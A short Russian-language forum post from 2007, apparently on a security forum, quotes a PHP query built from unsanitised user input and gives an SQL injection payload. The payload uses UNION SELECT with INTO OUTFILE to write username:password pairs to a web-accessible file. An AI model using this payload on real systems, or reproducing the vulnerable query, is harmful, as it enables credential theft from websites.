12.01.2007, 00:27
|
|
Познающий
Регистрация: 09.10.2006
Сообщений: 92
Провел на форуме:
347686
Репутация:
87
|
|
мда...
$query = "SELECT password FROM users WHERE name='".$_POST['name']."'";
Сколько ещё надо статей написать о MySQL-Inj.....?
Сплоит->В name вбиваем:
999999 UNION SELECT concat(name,':',password) FROM users INTO OUTFILE '<путь в веб-дыру>'
|
|
|